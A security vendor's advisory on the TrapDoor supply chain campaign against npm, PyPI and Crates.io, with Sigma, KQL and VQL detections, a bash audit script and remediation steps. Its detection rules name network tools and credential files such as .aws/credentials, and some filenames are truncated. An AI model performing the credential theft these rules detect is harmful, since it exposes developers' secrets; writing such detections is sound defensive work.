A sophisticated and coordinated supply chain attack, codenamed TrapDoor, has been actively targeting the developer ecosystem since May 22, 2026. This campaign is notable for its cross-ecosystem reach, simultaneously poisoning the npm, PyPI, and Crates.io repositories to distribute credential-stealing malware.
With over 34 malicious packages identified spanning more than 384 versions, the attackers are leveraging the trust inherent in open-source dependencies to compromise development environments. The primary objective is exfiltration of credentials, likely targeting cloud infrastructure keys, source code repository tokens, and internal system passwords. For SOC analysts and engineers, this represents a critical failure of the software supply chain, requiring immediate auditing of build pipelines and runtime environments.
Technical Analysis
Affected Platforms:
- npm (Node.js): Malicious JavaScript packages.
- PyPI (Python): Poisoned Python libraries.
- Crates.io (Rust): Malicious Rust crates.
Attack Mechanics:
The TrapDoor campaign relies on package typosquatting and dependency confusion techniques. Attackers publish packages with names strikingly similar to popular legitimate libraries or obscure names within the node_modules, site-packages, or cargo registry paths.
Upon installation (e.g., npm install, pip install), the malicious packages execute scripts during the install lifecycle (e.g., preinstall, postinstall, or setup.py).
- Execution: The payload typically decodes obfuscated scripts embedded in the package manifest.
- Reconnaissance: The malware scans the host machine for sensitive files, specifically targeting:
.aws/credentialsand.aws/config.npmrctokens- SSH keys (
id_rsa,id_ed25519) .envfiles containing API keys
- Exfiltration: Stolen data is transmitted via HTTPS to attacker-controlled Command and Control (C2) infrastructure, often masquerading as legitimate telemetry or API requests to bypass egress filtering.
Exploitation Status:
- Active Exploitation: Confirmed in-the-wild activity starting May 22, 2026.
- CVE Status: No specific CVEs have been assigned for the malicious packages themselves as they are distinct artifacts rather than vulnerabilities in the package managers. However, this falls under the umbrella of CWE-829: Inclusion of Functionality from Untrusted Control Sphere.
Detection & Response
Detection of TrapDoor requires identifying anomalous behavior initiated by package managers or their child processes. The following rules focus on the execution of network utilities or shell commands by package installation processes, which is atypical for standard dependency installation.
---
title: TrapDoor - Suspicious Child Process of Package Managers
id: 9a8b7c6d-5e4f-3a2b-1c0d-9e8f7a6b5c4d
status: experimental
description: Detects package managers (npm, pip, cargo) spawning shells or network tools, a common TTP in supply chain attacks like TrapDoor.
references:
- https://thehackernews.com/2026/05/trapdoor-supply-chain-attack-spreads.html
author: Security Arsenal
date: 2026/05/23
tags:
- attack.execution
- attack.t1059.001
- attack.initial_access
- attack.t1195.002
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith:
- '\npm.exe'
- '\npm.cmd'
- '\node.exe'
- '\pip.exe'
- '\pip3.exe'
- '\python.exe'
- '\cargo.exe'
selection_child:
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
- '\bash.exe'
- '\curl.exe'
- '\wget.exe'
- '\certutil.exe'
condition: all of selection_*
falsepositives:
- Legitimate build scripts that require post-install configuration (rare)
level: high
---
title: TrapDoor - Linux Package Manager Spawning Shell
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects npm, pip, or cargo on Linux spawning a shell or curl, indicative of malicious postinstall scripts.
references:
- https://thehackernews.com/2026/05/trapdoor-supply-chain-attack-spreads.html
author: Security Arsenal
date: 2026/05/23
tags:
- attack.execution
- attack.t1059.004
- attack.initial_access
- attack.t1195.002
logsource:
category: process_creation
product: linux
detection:
selection_parent:
ParentProcessName|endswith:
- 'npm'
- 'pip'
- 'pip3'
- 'cargo'
selection_child:
ProcessName|endswith:
- 'sh'
- 'bash'
- 'curl'
- 'wget'
- 'python'
- 'node'
condition: all of selection_*
falsepositives:
- Developer build scripts requiring environment setup
level: medium
---
title: TrapDoor - Credential File Access by Dev Tool
id: 2c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
status: experimental
description: Detects known package manager binaries accessing sensitive credential files on disk.
references:
- https://thehackernews.com/2026/05/trapdoor-supply-chain-attack-spreads.html
author: Security Arsenal
date: 2026/05/23
tags:
- attack.collection
- attack.t1005
- attack.credential_access
logsource:
category: file_access
product: windows
detection:
selection:
Image|endswith:
- '\node.exe'
- '\python.exe'
- '\cargo.exe'
TargetFilename|contains:
- '\.aws\credentials'
- '\.aws\config'
- '\.npmrc'
- '\.gitconfig'
condition: selection
falsepositives:
- Legitimate AWS SDK or Git configuration operations by the user
level: high
**KQL (Microsoft Sentinel / Defender)**
This query hunts for process creation events where package managers initiate suspicious child processes or network connections.
let PackageManagers = dynamic(["npm.exe", "node.exe", "pip.exe", "pip3.exe", "python.exe", "cargo.exe"]);
let SuspiciousTools = dynamic(["powershell.exe", "cmd.exe", "curl.exe", "wget.exe", "bash.exe"]);
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ (PackageManagers) or InitiatingProcessFileName in~ (PackageManagers)
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| join kind=inner (
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ (SuspiciousTools)
) on $left.ProcessId == $right.InitiatingProcessId
| project Timestamp, DeviceName, AccountName, ParentProcess=FileName, ChildProcess=FileName1, ParentCommandLine=ProcessCommandLine, ChildCommandLine=ProcessCommandLine1
**Velociraptor VQL**
Hunt for recent package installations that spawned shell processes or accessed hidden directories in user homes.
-- Hunt for package managers spawning suspicious shells
SELECT Parent.Pid AS ParentPid, Parent.Name AS ParentName, Child.Name AS ChildName, Child.Cmdline AS ChildCmdline, Child.StartTime
FROM pslist()
LEFT JOIN pslist() AS Parent ON Child.Ppid = Parent.Pid
WHERE Parent.Name IN ('npm', 'node', 'pip', 'pip3', 'python', 'python3', 'cargo')
AND Child.Name IN ('sh', 'bash', 'powershell', 'pwsh', 'curl', 'wget')
AND Child.StartTime > now() - 7 * 24 * 3600 -- Last 7 days
**Remediation Script (Bash)**
This script audits common dependency directories for recent modifications matching the TrapDoor timeline and checks for known environment variable tampering.
#!/bin/bash
# TrapDoor Audit Script
# Checks for recently modified packages in user-local directories
echo "[*] Auditing for TrapDoor malicious packages..."
# Define scope
TIMESTAMP=$(date -d '2026-05-22' +%s)
CURRENT_TIME=$(date +%s)
# Function to check for recently modified suspicious files
audit_directory() {
local dir="$1"
if [ -d "$dir" ]; then
echo "[+] Checking $dir for modifications since May 22, 2026..."
# Find files touched in the last 5 days (approx) to catch recent activity
find "$dir" -type f -mtime -5 \( -name "package." -o -name "setup.py" -o -name "Cargo.toml" \) -exec ls -la {} \; 2>/dev/null
fi
}
# Check user-local python packages
audit_directory "$HOME/.local/lib/python*/site-packages"
# Check npm global packages
audit_directory "$HOME/.npm/_logs"
# Check global node_modules (common locations)
audit_directory "/usr/local/lib/node_modules"
audit_directory "$HOME/node_modules"
# Check Cargo registry
audit_directory "$HOME/.cargo/registry"
# Check for suspicious environment variables often used in these attacks
if [ -n "$NODE_OPTIONS" ]; then
echo "[!] WARNING: NODE_OPTIONS is set: $NODE_OPTIONS"
fi
echo "[*] Audit complete. Review findings for unknown or typosquatted packages."
Remediation
Immediate containment and remediation are required to prevent credential loss.
-
Identify and Remove:
- Review the full list of TrapDoor IOCs (once published by vendors) against your
package-lock.,yarn.lock,Pipfile, andCargo.lockfiles. - Remove any identified malicious packages immediately.
- Revert codebases to commits prior to May 22, 2026, if contamination is confirmed in the repository.
- Review the full list of TrapDoor IOCs (once published by vendors) against your
-
Credential Rotation:
- Assume Compromise: If these packages were executed in a build or dev environment, treat all credentials present during that time as compromised.
- Rotate AWS Access Keys, GitHub Personal Access Tokens (PATs), SSH keys, and database credentials found on affected hosts.
-
Patch and Harden:
- Dependency Pinning: Ensure lockfiles are committed to version control and audited before merging.
- Private Registries: Enforce the use of private npm/PyPI mirrors (e.g., Artifactory, Sonatype Nexus) that block packages failing security checks or typosquatting heuristics.
- SCA Integration: Integrate Software Composition Analysis (SCA) tools into the CI/CD pipeline to block builds if new vulnerabilities or malicious packages are detected.
-
Vendor Advisories:
- Monitor official advisories from npm, PyPI, and Rust/Crates.io for specific package removals and checksums.
Related Resources
Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.